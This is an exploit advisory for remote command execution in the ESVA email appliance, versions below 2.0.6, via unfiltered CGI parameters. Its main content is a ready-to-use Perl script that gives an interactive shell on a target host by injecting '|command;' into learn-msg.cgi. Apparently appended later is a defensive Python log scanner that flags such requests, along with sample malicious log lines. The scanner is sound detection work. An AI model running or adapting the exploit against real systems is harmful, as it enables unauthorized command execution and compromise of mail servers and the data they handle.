# Exploit Title: E-Mail Security Virtual Appliance (ESVA) Remote Execution.
# Date: 10 Aug 2012
# Exploit Author: iJoo
# Vendor Homepage: http://www.esvacommunity.com/
# Software Link: http://sourceforge.net/projects/esva-project/
# Version: < 2.0.6
ESVA (E-Mail Security Virtual Appliance) is a pre-built and semi-configured email scanning appliance that will run on VMware Workstation, Server, Player or ESX Server.
-=+ Affected Files
…./cgi-bin/learn-msg.cgi
…./cgi-bin/release-msg.cgi
No stripping or filtering of shell metacharacters was found in these scripts.
An attacker can easily execute commands.
-=+ Simple RCE ESVA
#! /usr/bin/perl
use LWP;
use HTTP::Request;
if (@ARGV < 1)
{
    print "\n==========================================\n";
    print " ESVA - REMOTE EXECUTION SCRIPT \n";
    print "==========================================\n";
    print "Usage: perl esva.pl host (without http://)\n";
    print "Ex. perl esva.pl www.korban.com\n";
    exit;
}
$host=$ARGV[0];
print "Try to Execution Command!\n";
print "iDSc-shell# ";
chomp( $cmd = <STDIN>);
while($cmd !~ "exit")
{
    $content = "";
    $ua = LWP::UserAgent->new();
    $ua->agent('');
    $request = HTTP::Request->new (GET => "http://".$host."/cgi-bin/learn-msg.cgi?id=%7c".$cmd."%3b");
    $response = $ua->request ($request);
    $content = $response->content;
    print $content."\n";
    print "iDSc-shell# ";
    chomp( $cmd = <STDIN>);
}
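A defender-side check for the request pattern above, as an added example that is not part of the original advisory: it scans web access-log lines for requests to the two CGI scripts whose `id` value contains anything outside an allow-list. The Apache combined log format, the allow-list for message ids, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script paths named in the advisory (their directory prefix is elided there,
# so matching is done on the path suffix).
AFFECTED = ("/cgi-bin/learn-msg.cgi", "/cgi-bin/release-msg.cgi")
# Assumption: a legitimate message id holds only letters, digits, '.' and '-'.
SAFE_ID = re.compile(r"[A-Za-z0-9.\-]+")
# Assumption: Apache combined log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)

def suspicious(line):
    """Return a finding for a log line that hits an affected CGI with an
    id value outside the allow-list, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if not url.path.endswith(AFFECTED):
        return None
    # parse_qs percent-decodes, so %7c and %3b are seen as '|' and ';'.
    ids = parse_qs(url.query, keep_blank_values=True).get("id", [])
    bad = [v for v in ids if not SAFE_ID.fullmatch(v)]
    if not bad:
        return None
    # The script above sends an empty User-Agent; treat that as a weak extra signal.
    return {"ip": m["ip"], "path": url.path, "id": bad[0],
            "empty_agent": m["agent"] in ("", "-")}

def scan(lines):
    """Collect findings for every matching line."""
    return [f for f in map(suspicious, lines) if f]

# Constructed sample log lines (documentation IP addresses, invented sizes).
SAMPLE = [
    '192.0.2.10 - - [10/Aug/2012:10:00:01 +0000] "GET /cgi-bin/learn-msg.cgi?id=%7cid%3b HTTP/1.1" 200 51 "-" "-"',
    '192.0.2.20 - - [10/Aug/2012:10:00:05 +0000] "GET /cgi-bin/release-msg.cgi?id=4F2A1B9C3D.A7E21 HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '192.0.2.30 - - [10/Aug/2012:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The same allow-list, applied inside the CGI scripts before the `id` value is used, rejects the metacharacters the request relies on.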
-=+ Thanks to
My lovely Country NKRI INDONESIA!!
Binh4x staff – www.binushacker.net // Forum.binushacker.net